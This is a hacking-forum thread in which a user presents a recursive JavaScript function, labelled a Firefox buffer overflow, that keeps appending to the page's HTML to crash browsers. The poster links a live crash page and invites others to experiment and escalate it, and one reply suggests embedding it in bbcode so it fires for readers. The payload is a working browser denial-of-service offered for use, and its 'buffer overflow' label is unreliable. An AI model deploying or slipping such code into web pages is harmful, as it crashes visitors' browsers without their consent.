[dos] Firefox Buffer Overflow

XURY

Member
Joined
May 9, 2015
Messages
60
Reaction score
96
Points
53
Hey!

So recently as i was browsing through the web i found a firefox vulnerability on exploit-db.
I thought "why not give it a try and improve it"! Let's try to revive things :D

This is what i came up with and obviously i managed to improve it ;)
CLICK HERE (WARNING - YOUR BROWSER WILL CRASH)

And it seems to overload other browsers in some strange way/s, too...

OVERLOAD CODE:
Code:
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x')))))))))))));
};
e('x')
Feel free to experiment with that!
Maybe using less characters will also take effects on the computer itself? Let's get this somewhere! ;)

OTHER BROWSERS
Internet Explorer - Keeps loading until a popup wants you to stop a script
Chrome - Again...Keeps loading until it asks you if you want to stop any scripts running
 
Last edited:

p0tassium

Member
Joined
Jun 13, 2015
Messages
68
Reaction score
48
Points
53
Nothing is happening on Chrome 45.0.2454.99m. Haven't tested on other browsers yet
 

Styleer

Restricted
Joined
Sep 19, 2015
Messages
3
Reaction score
0
Points
33
You should do as
bbcode
img] so it will be more cool.
< this means your url will not work inside of bbcode as img
 

swarmdeco

Member
Joined
Feb 27, 2016
Messages
25
Reaction score
48
Points
48
Just to contribute, Today (20 Feb 2016) Firefox 44.0.2 (Updated) still crashing...

qLNDgyI.png
 
Top